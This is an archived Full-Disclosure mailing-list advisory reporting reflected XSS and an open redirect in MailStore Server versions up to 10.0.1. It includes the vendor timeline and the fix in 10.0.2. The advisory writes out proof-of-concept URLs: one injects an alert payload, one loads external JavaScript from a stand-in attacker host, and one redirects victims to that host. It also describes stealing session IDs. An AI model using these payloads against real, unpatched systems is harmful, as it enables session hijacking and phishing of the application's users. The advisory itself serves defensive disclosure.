| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <7a3974e6a1bc4e37ba4778352b150aa2@TclanGroupware.secuvera.de> Date: Tue, 31 Jan 2017 14:24:28 +0000 From: Tobias Glemser <tglemser@...uvera.de> To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>, "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server Affected Products MailStore Server Version 10.0.1.12148 was tested according to the vendor: - MailStore 9.2 to 10.0.1 is affected by the Reflected XSS Vulnerability - Mailstore 9.0 to 10.0.1 is affected by the Open Redirect Vulnerability References https://www.secuvera.de/advisories/secuvera-SA-2017-02.txt CWE-79 https://cwe.mitre.org/data/definitions/79.html CWE-601 https://cwe.mitre.org/data/definitions/601.html Summary: "MailStore Server is one of the world’s leading solutions for email archiving, management and compliance for small and medium-sized businesses." The in-built Webapplication does not properly validate untrusted input in several variables. This leads to both Reflected Cross-Site-Scripting (XSS) and an Open Redirect. Effect: To exploit the reflected XSS, the victim has to be authenticated to the Mailstore Webapplication. By clicking on a link sent to a victim, an attacker could for example copy the victims Session-ID to his on data sink. Sending another link with a crafted URL, the attacker could redirect the victim to a malicious website, while the link itself points to the trusted Mailstore-Address. The victim is not required to be authenticated. Vulnerable Scripts Reflected XSS for authenticated users: /search-result/, Parameters c-f, c-q, c-from and c-to /message/ajax/send/, Parameter recipient Vulnerable Script Open Redirect: derefer/, Parameter url Example for reflected XSS: https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E #Load external JS-Code https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E Example for Open Redirect: https://www.example.com:8462/a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de Solution: Update to Version 10.0.2 Disclosure Timeline: 2017/01/09 vendor contacted 2017/01/10 initial vendor response asking for technical details 2017/01/10 provided vendor with the advisory including technical details 2017/01/13 vendor provided informations about affected versions and mitigation 2017/01/18 update published by vendor 2017/01/31 public disclosure Credits: Tobias Glemser tglemser@...uvera.de secuvera GmbH https://www.secuvera.de Disclaimer: All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore secuvera shall not be liable for any direct or indirect damages that might be caused by using this information. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists